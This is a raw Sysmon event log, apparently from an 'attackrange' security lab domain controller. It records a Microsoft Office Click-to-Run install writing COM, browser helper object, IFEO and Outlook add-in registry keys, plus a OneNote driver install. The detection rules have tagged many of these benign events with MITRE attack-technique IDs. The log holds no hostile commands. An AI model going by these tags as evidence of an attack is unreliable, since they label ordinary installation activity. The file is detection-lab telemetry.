14:55:56.704{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EB7C-607E-900B-00000000BB01}5132C:\Windows\system32\DrvInst.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\umpnpmgr.dll+a82c|c:\windows\system32\umpnpmgr.dll+9dc7|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+29cc|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000072154Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.706{A7A01FEF-EB7C-607E-900B-00000000BB01}5132C:\Windows\System32\drvinst.exe10.0.14393.0 (rs1_release.160715-1616)Driver Installation ModuleMicrosoft® Windows® Operating SystemMicrosoft CorporationDrvInst.EXEDrvInst.exe "4" "9" "C:\Program Files\Microsoft Office\root\Office16\OneNote\\prnms006.inf" "9" "44b58805b" "0000000000000BC4" "Service-0x0-3e7$\Default" "00000000000008D0" "208" "C:\Program Files\Microsoft Office\root\Office16\OneNote\"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=188CE3916E9FD3D123F38F01F8F8B93C,SHA256=C196086017725E8724DAB1DFDFABA9F4B7CFACD47A885BCC81984F8BC78D9F75,IMPHASH=35385286B2F23FB279C3D2868A503474{A7A01FEF-B625-607E-0C00-00000000BB01}668C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 13241300x800000000000000072153Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.563{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{D0B22D03-D05D-4C6D-8AB7-9392E84A87B9}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEDAO.DLL 13241300x800000000000000072152Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.563{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{D5EC4D34-77DA-4F7A-B8C4-8A910C1C1CFE}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEDAO.DLL 13241300x800000000000000072151Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.563{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{805B7F91-C9CF-4EDF-ACA6-775664FDFB3E}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEDAO.DLL 13241300x800000000000000072150Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.563{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{97A2762C-403C-4953-A121-7A75ABCE4373}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEDAO.DLL 13241300x800000000000000072149Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.563{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{8D4F994C-EBBE-4F8D-BA4B-AE20CD36E72D}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEDAO.DLL 13241300x800000000000000072148Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.563{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{A1EB89D6-0A9C-4575-A0AE-654A990A454C}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEDAO.DLL 13241300x800000000000000072147Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.563{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{367E582C-F71C-4BF9-AA1B-9F62B793E9C5}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEDAO.DLL 13241300x800000000000000072146Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.563{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{6F3DD387-5AF2-492B-BDE2-30FF2F451241}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEDAO.DLL 13241300x800000000000000072145Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.547{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{CD7791B9-43FD-42C5-AE42-8DD2811F0419}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEDAO.DLL 13241300x800000000000000072144Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1183,IFEOSetValue2021-04-20 14:55:56.547{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msaccess.exe\MitigationOptionsQWORD (0x00000000-0x00000100) 23542300x800000000000000072143Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.547{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\nslist.hxlMD5=B6EF895E07B24568B4B1D5039DC3505A,SHA256=CC257B59D2D54C7AFF7EE2B415962348E11460E0A0FAB877E8980018EE2E16DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072142Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.532{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\nslist.hxlMD5=830C76D17FA4D53F1B6E8E8F8EF3686B,SHA256=787469C3EB53F41CE02F44CF5DF6B54DE117B8F1B5677FFEBCF6C6E514CF2067,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072141Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.532{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\nslist.hxlMD5=D881D9A1CDAF6E093768CBFCADFFC75B,SHA256=6A30135916B925A67EE2044E7AEDD2B311CA6A4B61ECE63C4A56B875D6C62536,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000072140Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.516{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{E2F5480E-ED5A-4DDE-B8A8-F9F297479F62}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\ODFFILT.DLL 13241300x800000000000000072139Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.516{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{4693FF15-B962-420A-9E5D-176F7D4B8321}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\ODFFILT.DLL 13241300x800000000000000072138Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.516{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{9FBC2D8F-6F52-4CFA-A86F-096F3E9EB4B2}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\ODFFILT.DLL 13241300x800000000000000072137Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.501{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{20E823C2-62F3-4638-96BD-90F4F6784EBC}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\OFFFILTX.DLL 13241300x800000000000000072136Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.501{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{312AB530-ECC9-496E-AE0E-C9E6C5392499}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\OFFFILTX.DLL 13241300x800000000000000072135Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.501{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{F90DFE0C-CBDF-41FF-8598-EDD8F222A2C8}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\OFFFILTX.DLL 13241300x800000000000000072134Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.501{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{DDFE337F-4987-4EC8-BDE3-133FA63D5D85}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\OFFFILTX.DLL 13241300x800000000000000072133Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.501{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{5A98B233-3C59-4B31-944C-0E560D85E6C3}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\OFFFILTX.DLL 13241300x800000000000000072132Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.501{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{4039B326-9F27-4B4A-B460-47A0C6A39D5C}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\MSGFILT.DLL 13241300x800000000000000072131Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1183,IFEOSetValue2021-04-20 14:55:56.501{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\excel.exe\MitigationOptionsQWORD (0x00000000-0x00000100) 23542300x800000000000000072130Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.485{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\nslist.hxlMD5=215F9A3F478E0AA5570B5B15281D02C1,SHA256=AFB6FE48BE9904AC65D06B9A48CC11903ED60F1F33B446A655278CB97ECEFF68,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000072129Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2021-04-20 14:55:56.485{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\IM Providers\Lync\FriendlyNameMicrosoft Lync 16 13241300x800000000000000072128Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.469{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{8AC780E1-BCDB-4816-A6EA-A88BCC064453}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\AutoHelper.dll 13241300x800000000000000072127Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.469{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{611B6CB4-ACE6-4655-8D60-15FAC4AD0952}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\AutoHelper.dll 13241300x800000000000000072126Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.469{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{8AC780E1-BCDB-4816-A6EA-A88BCC064453}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\AutoHelper.dll 13241300x800000000000000072125Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.454{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{611B6CB4-ACE6-4655-8D60-15FAC4AD0952}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\AutoHelper.dll 13241300x800000000000000072124Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.454{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\ButtonTextLync Click to Call 13241300x800000000000000072123Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.454{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\NoExplorer1 13241300x800000000000000072122Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.454{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\(Default)Lync Click to Call BHO 13241300x800000000000000072121Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.454{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Office\16.0\ClickToRunStore\HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}DWORD (0x00000000) 13241300x800000000000000072120Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.438{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\Default VisibleYes 13241300x800000000000000072119Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.438{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\ClsidExtension{31D09BA0-12F5-4CCE-BE8A-2923E76605DA} 13241300x800000000000000072118Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.438{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\CLSID{1FBA04EE-3024-11d2-8F1F-0000F87ABD16} 13241300x800000000000000072117Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.438{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\HotIconC:\Program Files\Microsoft Office\root\Office16\lync.exe,1 13241300x800000000000000072116Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.438{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\IconC:\Program Files\Microsoft Office\root\Office16\lync.exe,1 13241300x800000000000000072115Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.438{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\MenuTextLync Click to Call 13241300x800000000000000072114Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.438{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\(Default)Lync Click to Call 13241300x800000000000000072113Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.438{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Office\16.0\ClickToRunStore\HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}DWORD (0x00000000) 13241300x800000000000000072112Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.438{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\OCHelper.dll 13241300x800000000000000072111Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.423{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{10336656-40D7-4530-BCC0-86CD3D77D25F}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\Interceptor.dll 13241300x800000000000000072110Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.407{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{a6a2383f-ad50-4d52-8110-3508275e77f7}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\UCADDIN.DLL 13241300x800000000000000072109Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1137SetValue2021-04-20 14:55:56.407{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Office\Outlook\Addins\UCAddin.LyncAddin.1\LoadBehaviorDWORD (0x00000003) 13241300x800000000000000072108Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1137SetValue2021-04-20 14:55:56.407{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Office\Outlook\Addins\UCAddin.LyncAddin.1\FriendlyNameSkype Meeting Add-in for Microsoft Office 13241300x800000000000000072107Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1137SetValue2021-04-20 14:55:56.407{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Office\Outlook\Addins\UCAddin.LyncAddin.1\DescriptionSkype Meeting Add-in for Microsoft Office 13241300x800000000000000072106Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1137SetValue2021-04-20 14:55:56.407{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Office\Outlook\Addins\UCAddin.LyncAddin.1\FileNameC:\Program Files\Microsoft Office\root\Office16\UCADDIN.DLL 13241300x800000000000000072105Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1137SetValue2021-04-20 14:55:56.407{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Office\16.0\ClickToRunStore\HKLM\SOFTWARE\Microsoft\Office\Outlook\Addins\UCAddin.LyncAddin.1DWORD (0x00000000) 13241300x800000000000000072104Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1137SetValue2021-04-20 14:55:56.407{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Office\Outlook\Addins\UCAddin.UCAddin.1\LoadBehaviorDWORD (0x00000002) 13241300x800000000000000072103Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1137SetValue2021-04-20 14:55:56.407{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Office\16.0\ClickToRunStore\HKLM\SOFTWARE\Microsoft\Office\Outlook\Addins\UCAddin.UCAddin.1DWORD (0x00000000) 13241300x800000000000000072102Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1183,IFEOSetValue2021-04-20 14:55:56.407{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lync.exe\MitigationOptionsQWORD (0x00000000-0x00000100) 13241300x800000000000000072101Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:56.407{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\Application\Lync\TypesSupportedDWORD (0x00000007) 13241300x800000000000000072100Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:56.407{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\Application\Lync\EventMessageFileC:\Program Files\Microsoft Office\root\Office16\1033\UCCAPIRES.DLL 13241300x800000000000000072099Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:56.407{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\Application\LyncPlatform\TypesSupportedDWORD (0x00000007) 13241300x800000000000000072098Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:56.407{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\Application\LyncPlatform\EventMessageFileC:\Program Files\Microsoft Office\root\Office16\1033\LYNCDESKTOPRESOURCES.DLL 23542300x800000000000000072097Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.407{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\nslist.hxlMD5=55110E6CEDC92DEC476AACD95F4B8CD2,SHA256=2B70668F2ADBA75510B2AB53660C716B160E16CBFEC9C8974E9EFC82B9FF2060,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072096Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.391{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\nslist.hxlMD5=616A2CFE16F3A355BF1C9B5C41107736,SHA256=19BA70B25696281DB70468A186AB184816B365D29EE0100240EBACD1AA8EFEA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072095Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.391{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\nslist.hxlMD5=B426B5FC2318AB3D353BB2013F9F1570,SHA256=25C73AE567F325B4057B07394D4A2445FBC6C5A9352E678FCF9E7607F867A309,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072094Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.391{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\nslist.hxlMD5=5691F63BEE62A54CE02D86F66C8AA16E,SHA256=461324258AEF670FBCB04B0743B2F70A9195A09F8B4817430DD972C214F8C40D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072093Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.391{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\nslist.hxlMD5=1712F18CEF3A0F374130AE98963FD0DA,SHA256=65548B0DD53844D40C700F438671959D3DF8460DDAAE98F3286180C2FC955482,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072092Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 